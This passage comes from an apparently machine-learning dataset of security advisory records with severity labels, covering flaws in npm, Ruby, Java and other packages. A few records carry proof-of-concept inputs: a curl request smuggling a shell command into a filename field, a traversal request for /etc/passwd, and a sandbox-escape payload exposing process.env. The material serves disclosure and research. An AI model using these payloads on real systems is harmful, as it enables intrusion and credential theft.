`qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string.\n\n\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-09", "split": "train"} -{"id": "228acc79ee026dc4380b", "text": "Remote Code Execution in pi_video_recording\n\nAll versions of `pi_video_recording` are vulnerable to Remote Code Execution. Due to insufficient input validation the server executes arbitrary code through the /api/record/start endpoint. After running the server, `curl -POST -H \"Content-Type: application/json\" -d '{\"filename\": \" || touch /tmp/worked;\"}' http://localhost:5000/api/record/start`creates a file in the /tmp/ directory\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "text_raw": "Remote Code Execution in pi_video_recording\n\n[Severity: HIGH]\n\nAll versions of `pi_video_recording` are vulnerable to Remote Code Execution. Due to insufficient input validation the server executes arbitrary code through the /api/record/start endpoint. After running the server, `curl -POST -H \"Content-Type: application/json\" -d '{\"filename\": \" || touch /tmp/worked;\"}' http://localhost:5000/api/record/start`creates a file in the /tmp/ directory\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "11ab448aa09da68ec76f", "text": "Cross-Site Scripting in dojo\n\nVersions of `dojo` prior to 1.2.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize HTML code in user-controlled input, allowing attackers to execute arbitrary JavaScript in the victim's browser.\n\n## Recommendation\n\nUpgrade to version 1.2.0 or later.", "text_raw": "Cross-Site Scripting in dojo\n\n[Severity: MEDIUM]\n\nVersions of `dojo` prior to 1.2.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize HTML code in user-controlled input, allowing attackers to execute arbitrary JavaScript in the victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 1.2.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "44943670c40257387299", "text": "Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.", "text_raw": "Moderate severity vulnerability that affects apache axis\n\n[Severity: MEDIUM]\n\nApache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "2147d192fe8c0e8eea20", "text": "SQL Injection in sails-mysql\n\nVersions of `sails-mysql` prior to 0.10.8 are vulnerable to SQL Injection. The `sort` keyword is not properly sanitized and may allow attackers to inject SQL statements and execute arbitrary SQL queries\n\n## Recommendation\n\nUpgrade to version 0.10.8 or later.", "text_raw": "SQL Injection in sails-mysql\n\n[Severity: HIGH]\n\nVersions of `sails-mysql` prior to 0.10.8 are vulnerable to SQL Injection. The `sort` keyword is not properly sanitized and may allow attackers to inject SQL statements and execute arbitrary SQL queries\n\n\n## Recommendation\n\nUpgrade to version 0.10.8 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "71a42d27fe06200ab40f", "text": "pym.js CSRF Vulnerability\n\nNPR Visuals Team Pym.js version versions 0.4.2 up to 1.3.1 contains a Cross Site Request Forgery (CSRF) vulnerability in Pym.js `_onNavigateToMessage` function.\n\nhttps://github.com/nprapps/pym.js/blob/master/src/pym.js#L573 can result in Arbitrary javascript code execution. This attack appears to be exploitable if the Attacker gains full javascript access to pages with Pym.js embeds, or when user visits an attacker-crafted page. This vulnerability appears to have been fixed in versions 1.3.2 and later.", "text_raw": "pym.js CSRF Vulnerability\n\n[Severity: HIGH]\n\nNPR Visuals Team Pym.js version versions 0.4.2 up to 1.3.1 contains a Cross Site Request Forgery (CSRF) vulnerability in Pym.js `_onNavigateToMessage` function. \n\nhttps://github.com/nprapps/pym.js/blob/master/src/pym.js#L573 can result in Arbitrary javascript code execution. This attack appears to be exploitable if the Attacker gains full javascript access to pages with Pym.js embeds, or when user visits an attacker-crafted page. This vulnerability appears to have been fixed in versions 1.3.2 and later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-03-13", "split": "train"} -{"id": "36abee7e9c2f9162f95b", "text": "In RubyGem excon, interrupted Persistent Connections May Leak Response Data\n\n### Impact\nThere was a race condition around persistent connections, where a connection which is interrupted (such as by a timeout) would leave data on the socket. Subsequent requests would then read this data, returning content from the previous response. The race condition window appears to be short, and it would be difficult to purposefully exploit this.\n\n### Patches\nThe problem has been patched in 0.71.0, users should upgrade to this or a newer version (if one exists).\n\n### Workarounds\nUsers can workaround the problem by disabling persistent connections, though this may cause performance implications.\n\n### References\nSee the [patch](https://github.com/excon/excon/commit/ccb57d7a422f020dc74f1de4e8fb505ab46d8a29) for further details.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [excon/issues](https://github.com/excon/excon/issues)\n* Email us at [geemus+github@gmail.com](mailto:geemus+github@gmail.com)", "text_raw": "In RubyGem excon, interrupted Persistent Connections May Leak Response Data\n\n[Severity: MEDIUM]\n\n### Impact\nThere was a race condition around persistent connections, where a connection which is interrupted (such as by a timeout) would leave data on the socket. Subsequent requests would then read this data, returning content from the previous response. The race condition window appears to be short, and it would be difficult to purposefully exploit this.\n\n### Patches\nThe problem has been patched in 0.71.0, users should upgrade to this or a newer version (if one exists).\n\n### Workarounds\nUsers can workaround the problem by disabling persistent connections, though this may cause performance implications.\n\n### References\nSee the [patch](https://github.com/excon/excon/commit/ccb57d7a422f020dc74f1de4e8fb505ab46d8a29) for further details.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [excon/issues](https://github.com/excon/excon/issues)\n* Email us at [geemus+github@gmail.com](mailto:geemus+github@gmail.com)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-16", "split": "train"} -{"id": "096f29c33b928298e2e9", "text": "jackson-databind mishandles the interaction between serialization gadgets and typing\n\nFasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).", "text_raw": "jackson-databind mishandles the interaction between serialization gadgets and typing\n\n[Severity: CRITICAL]\n\nFasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-05-15", "split": "train"} -{"id": "54bc4511178c86584feb", "text": "actionpack allows remote attackers to bypass database-query restrictions, perform NULL checks via crafted request\n\n`actionpack/lib/action_dispatch/http/request.rb` in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain `['xyz', nil]` values, a related issue to CVE-2012-2660.", "text_raw": "actionpack allows remote attackers to bypass database-query restrictions, perform NULL checks via crafted request\n\n[Severity: MEDIUM]\n\n`actionpack/lib/action_dispatch/http/request.rb` in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain `['xyz', nil]` values, a related issue to CVE-2012-2660.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "e7264d067875dbb331fd", "text": "Account takeover and privilege escalation is possible in applications generated by generator-jhipster before 6.3.0. This is due to a vulnerability in the generated java classes: CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)\n\nGenerated applications must be manually patched, following instructions in the release notes: https://www.jhipster.tech/2019/09/13/jhipster-release-6.3.0.html", "text_raw": "Critical severity vulnerability that affects generator-jhipster\n\n[Severity: CRITICAL]\n\nAccount takeover and privilege escalation is possible in applications generated by generator-jhipster before 6.3.0. This is due to a vulnerability in the generated java classes: CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)\n\nGenerated applications must be manually patched, following instructions in the release notes: https://www.jhipster.tech/2019/09/13/jhipster-release-6.3.0.html\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-09-13", "split": "train"} -{"id": "f21bb491800d858df024", "text": "Insert tag injection in the Contao login module\n\n### Impact\n\nIt is possible to inject insert tags into the login module which will be replaced when the page is rendered.\n\n### Patches\n\nUpdate to Contao 4.8.6.\n\n### Workarounds\n\nNone.\n\n### References\n\nhttps://contao.org/en/security-advisories/insert-tag-injection-in-the-login-module\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", "text_raw": "Insert tag injection in the Contao login module\n\n[Severity: MEDIUM]\n\n### Impact\n\nIt is possible to inject insert tags into the login module which will be replaced when the page is rendered.\n\n### Patches\n\nUpdate to Contao 4.8.6.\n\n### Workarounds\n\nNone.\n\n### References\n\nhttps://contao.org/en/security-advisories/insert-tag-injection-in-the-login-module\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-17", "split": "train"} -{"id": "9193239a9435b7f12f02", "text": "Mautic users able to download any files from server using filemanager\n\n### Impact\nMautic versions 1.0.0 - 2.11.0 are vulnerable to allowing any authorized Mautic user session (must be logged into Mautic) to use the Filemanager to download any file from the server that the web user has access to.\n\n### Patches\nUpdate to 2.12.0 or later.\n\n### Workarounds\nNone\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@mautic.org](mailto:security@mautic.org)", "text_raw": "Mautic users able to download any files from server using filemanager\n\n[Severity: MEDIUM]\n\n### Impact\nMautic versions 1.0.0 - 2.11.0 are vulnerable to allowing any authorized Mautic user session (must be logged into Mautic) to use the Filemanager to download any file from the server that the web user has access to.\n\n### Patches\nUpdate to 2.12.0 or later.\n\n### Workarounds\nNone\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@mautic.org](mailto:security@mautic.org)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-01-19", "split": "train"} -{"id": "393f13d660855ddbe45f", "text": "parse-server new anonymous user session acts as if it's created with password\n\n### Impact\n\nDevelopers that use the REST API to signup users and also allow users to login anonymously. When an anonymous user is first signed up using REST, the server creates session incorrectly, particularly the `authProvider` field in `_Session` class under `createdWith` shows the user logged in creating a password. If a developer later depends on the `createdWith` field to provide a different level of access between a password user and anonymous user, the server incorrectly classified the session type as being created with a `password`.\n\nThe server currently doesn't use `createdWith` to make decisions on how things work internally, so if a developer isn't using `createdWith` directly, there's nothing to worry about. The vulnerability only affects users who depend on `createdWith` by using it directly.\n\n### Patches\nUpgrade to version 4.5.1.\n\n### Workarounds\nDon't use the `createdWith` Session field to make decisions if you allow anonymous login.\n\n### References\nn/a", "text_raw": "parse-server new anonymous user session acts as if it's created with password\n\n[Severity: MEDIUM]\n\n### Impact\n\nDevelopers that use the REST API to signup users and also allow users to login anonymously. When an anonymous user is first signed up using REST, the server creates session incorrectly, particularly the `authProvider` field in `_Session` class under `createdWith` shows the user logged in creating a password. If a developer later depends on the `createdWith` field to provide a different level of access between a password user and anonymous user, the server incorrectly classified the session type as being created with a `password`.\n\nThe server currently doesn't use `createdWith` to make decisions on how things work internally, so if a developer isn't using `createdWith` directly, there's nothing to worry about. The vulnerability only affects users who depend on `createdWith` by using it directly. \n\n### Patches\nUpgrade to version 4.5.1.\n\n### Workarounds\nDon't use the `createdWith` Session field to make decisions if you allow anonymous login.\n\n### References\nn/a", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "52316abccf574f93d7ab", "text": "Sandbox Breakout / Arbitrary Code Execution in pitboss-ng\n\nAll versions of `pitboss-ng` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "text_raw": "Sandbox Breakout / Arbitrary Code Execution in pitboss-ng\n\n[Severity: CRITICAL]\n\nAll versions of `pitboss-ng` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.\n \n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "bc42134a03c6dea8e801", "text": "OS Command Injection in devcert-sanscache\n\ndevcert-sanscache before 0.4.7 allows remote attackers to execute arbitrary code or cause a Command Injection via the exec function. The variable `commonName` controlled by user input is used as part of the `exec` function without any sanitization.", "text_raw": "OS Command Injection in devcert-sanscache\n\n[Severity: CRITICAL]\n\ndevcert-sanscache before 0.4.7 allows remote attackers to execute arbitrary code or cause a Command Injection via the exec function. The variable `commonName` controlled by user input is used as part of the `exec` function without any sanitization.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-04-14", "split": "train"} -{"id": "f1152c8b4f868b2a074e", "text": "Regular Expression Denial of Service\n\nA Regular Expression vulnerability was found in nwmatcher before 1.4.4. The fix replacing multiple repeated instances of the \"\\s*\" pattern.", "text_raw": "Regular Expression Denial of Service\n\n[Severity: MEDIUM]\n\nA Regular Expression vulnerability was found in nwmatcher before 1.4.4. The fix replacing multiple repeated instances of the \"\\s*\" pattern.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-07", "split": "train"} -{"id": "ef837ea3784fb1995a87", "text": "Downloads Resources over HTTP in unicode-json\n\nAffected versions of `unicode-json` insecurely downloads resources over HTTP.\n\n## Recommendation\n\nInstall version 2.0.0 or greater.", "text_raw": "Downloads Resources over HTTP in unicode-json\n\n[Severity: HIGH]\n\nAffected versions of `unicode-json` insecurely downloads resources over HTTP. \n\nIn scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.\n\n\n## Recommendation\n\nInstall version 2.0.0 or greater.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "868e5be9800fd9b012d5", "text": "Directory Traversal in serverabc\n\nAffected versions of `serverabc` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in serverabc\n\n[Severity: HIGH]\n\nAffected versions of `serverabc` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "6028d015d10e11b5cee2", "text": "Downloads Resources over HTTP in qbs\n\nAffected versions of `qbs` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `qbs`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in qbs\n\n[Severity: HIGH]\n\nAffected versions of `qbs` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `qbs`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "b77c0ac4e809dd44630a", "text": "bounter Null pointer reference\n\nNull pointer reference in CMS_Conservative_increment_obj in RaRe-Technologies bounter version 1.01 and 1.10, allows attackers to conduct Denial of Service attacks by inputting a huge width of hash bucket.", "text_raw": "bounter Null pointer reference\n\n[Severity: HIGH]\n\nNull pointer reference in CMS_Conservative_increment_obj in RaRe-Technologies bounter version 1.01 and 1.10, allows attackers to conduct Denial of Service attacks by inputting a huge width of hash bucket.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-18", "split": "train"} -{"id": "0fe817d3e7f4c11b6d34", "text": "Improper Input Validation in sails-hook-sockets\n\nSails.js before v1.0.0-46 allows attackers to cause a denial of service with a single request because there is no error handler in sails-hook-sockets to handle an empty pathname in a WebSocket request.", "text_raw": "Improper Input Validation in sails-hook-sockets\n\n[Severity: HIGH]\n\nSails.js before v1.0.0-46 allows attackers to cause a denial of service with a single request because there is no error handler in sails-hook-sockets to handle an empty pathname in a WebSocket request.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-24", "split": "train"} -{"id": "8fc8a178e2a4fcfc5eea", "text": "Division by zero in TFLite's implementation of Split\n\n### Impact\nThe implementation of the `Split` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e2752089ef7ce9bcf3db0ec618ebd23ea119d0c7/tensorflow/lite/kernels/split.cc#L63-L65):\n\n```cc\nTF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, \"Not an even split\");\nconst int slice_size = input_size / num_splits;\n```\n\nAn attacker can craft a model such that `num_splits` would be 0.\n\n### Patches\nWe have patched the issue in GitHub commit [b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d](https://github.com/tensorflow/tensorflow/commit/b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Division by zero in TFLite's implementation of Split\n\n[Severity: LOW]\n\n### Impact\nThe implementation of the `Split` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e2752089ef7ce9bcf3db0ec618ebd23ea119d0c7/tensorflow/lite/kernels/split.cc#L63-L65):\n\n```cc\nTF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, \"Not an even split\");\nconst int slice_size = input_size / num_splits;\n```\n\nAn attacker can craft a model such that `num_splits` would be 0.\n\n### Patches\nWe have patched the issue in GitHub commit [b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d](https://github.com/tensorflow/tensorflow/commit/b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360. ", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "e5c7b4321006dee6f500", "text": "Improper Input Validation python-gnupg\n\npython-gnupg 0.4.3 allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended. To perform the attack, the passphrase to gnupg must be controlled by the adversary and the ciphertext should be trusted. Related to a \"CWE-20: Improper Input Validation\" issue affecting the affect functionality component.", "text_raw": "Improper Input Validation python-gnupg\n\n[Severity: HIGH]\n\npython-gnupg 0.4.3 allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended. To perform the attack, the passphrase to gnupg must be controlled by the adversary and the ciphertext should be trusted. Related to a \"CWE-20: Improper Input Validation\" issue affecting the affect functionality component.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-03-25", "split": "train"} -{"id": "c5b5d7148b82f29f1734", "text": "Buffer not correctly recycled in Gzip Request inflation\n\n### Impact\nIf GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection and if an \nattacker can send a request with a body that is received entirely by not consumed by the application, then a subsequent request\non the same connection will see that body prepended to it's body.\n\nThe attacker will not see any data, but may inject data into the body of the subsequent request\n\n### Workarounds\nThe problem can be worked around by either:\n- Disabling compressed request body inflation by GzipHandler.\n- By always fully consuming the request content before sending a response.\n- By adding a `Connection: close` to any response where the servlet does not fully consume request content.", "text_raw": "Buffer not correctly recycled in Gzip Request inflation\n\n[Severity: MEDIUM]\n\n### Impact\nIf GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection and if an \nattacker can send a request with a body that is received entirely by not consumed by the application, then a subsequent request\non the same connection will see that body prepended to it's body.\n\nThe attacker will not see any data, but may inject data into the body of the subsequent request\n\nCVE score is [4.8 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L&version=3.1)\n\n### Workarounds\nThe problem can be worked around by either:\n- Disabling compressed request body inflation by GzipHandler.\n- By always fully consuming the request content before sending a response.\n- By adding a `Connection: close` to any response where the servlet does not fully consume request content.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-12-02", "split": "train"} -{"id": "310e37136e9aef006995", "text": "Cross-Site Scripting in swagger-ui\n\nAffected versions of `swagger-ui` are vulnerable to cross-site scripting. This vulnerability exists because `swagger-ui` automatically executes external Javascript that is loaded in via the `url` query string parameter when a `Content-Type: application/javascript` header is included.\n\nAn attacker can create a server that replies with a malicious script and the proper content-type, and then craft a `swagger-ui` URL that includes the location to their server/script in the `url` query string parameter. When viewed, such a link would execute the attacker's malicious script.\n\n## Recommendation\n\nUpdate to 2.2.1 or later.", "text_raw": "Cross-Site Scripting in swagger-ui\n\n[Severity: HIGH]\n\nAffected versions of `swagger-ui` are vulnerable to cross-site scripting. This vulnerability exists because `swagger-ui` automatically executes external Javascript that is loaded in via the `url` query string parameter when a `Content-Type: application/javascript` header is included.\n\nAn attacker can create a server that replies with a malicious script and the proper content-type, and then craft a `swagger-ui` URL that includes the location to their server/script in the `url` query string parameter. When viewed, such a link would execute the attacker's malicious script.\n\n\n## Recommendation\n\nUpdate to 2.2.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "140042cb8d64cd1334c0", "text": "MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability", "text_raw": "MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2010-12-15", "split": "train"} -{"id": "f8fb3b290a918bfc38e3", "text": "Excessive CPU usage\n\nEnvoy, which Pomerium is based on, incorrectly handles resetting of HTTP/2 streams with excessive complexity. This can lead to high CPU utilization when a large number of streams are reset.\n\n### Impact\n\nThis can result in a DoS condition.\n\n### Patches\nPomerium versions 0.14.8 and 0.15.1 contain an upgraded envoy binary with this vulnerability patched.\n\n### Workarounds\nN/A\n\n### References\n[envoy GSA](https://github.com/envoyproxy/envoy/security/advisories/GHSA-3xh3-33v5-chcc)\n[envoy CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32778)\n[envoy announcement](https://groups.google.com/g/envoy-announce/c/5xBpsEZZDfE/m/wD05NZBbAgAJ)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [pomerium/pomerium](https://github.com/pomerium/pomerium/issues)\n* Email us at [security@pomerium.com](mailto:security@pomerium.com)", "text_raw": "Excessive CPU usage\n\n[Severity: HIGH]\n\nEnvoy, which Pomerium is based on, incorrectly handles resetting of HTTP/2 streams with excessive complexity. This can lead to high CPU utilization when a large number of streams are reset. \n\n### Impact\n\nThis can result in a DoS condition.\n\n### Patches\nPomerium versions 0.14.8 and 0.15.1 contain an upgraded envoy binary with this vulnerability patched.\n\n### Workarounds\nN/A\n\n### References\n[envoy GSA](https://github.com/envoyproxy/envoy/security/advisories/GHSA-3xh3-33v5-chcc)\n[envoy CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32778)\n[envoy announcement](https://groups.google.com/g/envoy-announce/c/5xBpsEZZDfE/m/wD05NZBbAgAJ)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [pomerium/pomerium](https://github.com/pomerium/pomerium/issues)\n* Email us at [security@pomerium.com](mailto:security@pomerium.com)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-10", "split": "train"} -{"id": "ad71360fceedfaef5624", "text": "Improper Input Validation in net.sf.robocode:robocode.host allows for external service interaction\n\nRobocode through 1.9.3.5 allows remote attackers to cause external service interaction (DNS), as demonstrated by a query for a unique subdomain name within an attacker-controlled DNS zone, because of a .openStream call within java.net.URL.", "text_raw": "Improper Input Validation in net.sf.robocode:robocode.host allows for external service interaction\n\n[Severity: CRITICAL]\n\nRobocode through 1.9.3.5 allows remote attackers to cause external service interaction (DNS), as demonstrated by a query for a unique subdomain name within an attacker-controlled DNS zone, because of a .openStream call within java.net.URL.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-04-02", "split": "train"} -{"id": "6bc4ce9279191c7214a1", "text": "objection.js Prototype Pollution vulnerability\n\nobjection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.", "text_raw": "objection.js Prototype Pollution vulnerability\n\n[Severity: CRITICAL]\n\nobjection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-07", "split": "train"} -{"id": "f30a0c7d66b2dcad235d", "text": "Remote code execution in Eclipse Theia\n\nIn Eclipse Theia 0.3.9 to 1.8.1, the \"mini-browser\" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.", "text_raw": "Remote code execution in Eclipse Theia\n\n[Severity: HIGH]\n\nIn Eclipse Theia 0.3.9 to 1.8.1, the \"mini-browser\" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-02", "split": "train"} -{"id": "9225ec78f32d0f6a5048", "text": "Reflected XSS when using flashMessages or languageDictionary\n\n### Overview\n\nVersions before and including `11.30.0` are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's\n- `flashMessage` feature is utilized and user input or data from URL parameters is incorporated into the `flashMessage`.\n- `languageDictionary` feature is utilized and user input or data from URL parameters is incorporated into the `languageDictionary`.\n\n### Am I affected?\nYou are affected by this vulnerability if you are using `auth0-lock` version `11.30.0` or lower and all of the following conditions apply:\n\n- You are utilizing `flashMessage` feature.\n- User input or data from URL parameters is incorporated into the `flashMessage`.\n\nAn example of a vulnerable snippet where query parameters are used to populate the `text` property of a `flashMessage`.\n```js\nvar params = new URLSearchParams(location.search);\nvar errorMessage = params.get('error__message');\nvar showParams = {};\n\nif (!!errorMessage === true) {\n showParams.flashMessage = {\n type: 'error',\n text: 'We were unable to log you in. ' + errorMessage,\n };\n}\n\nlock.show(showParams);\n```\n\nOR\n\n- You are utilizing `languageDictionary` feature.\n- User input or data from URL parameters is used in `languageDictionary` properties.\n\nAn example of a vulnerable snippet where query parameters are used to populate the `socialLoginInstructions` property of a `languageDictionary`.\n```js\nvar params = new URLSearchParams(location.search);\nvar instruction = params.get('instruction');\n\nvar options = {\n languageDictionary: {\n emailInputPlaceholder: \"something@youremail.com\",\n title: \"title\",\n socialLoginInstructions: instruction\n },\n};\n\nvar lock = new Auth0LockPasswordless(\n CLIENT_ID,\n DOMAIN,\n options\n);\n\nlock.show()\n```\n\n### How to fix that?\nUpgrade to version `11.30.1`.\n\n### Will this update impact my users?\nThe fix uses [DOMPurify](https://github.com/cure53/DOMPurify) to sanitise the `flashMessage` and `languageDictionary` inputs. If you are including inline JavaScript in these fields, like 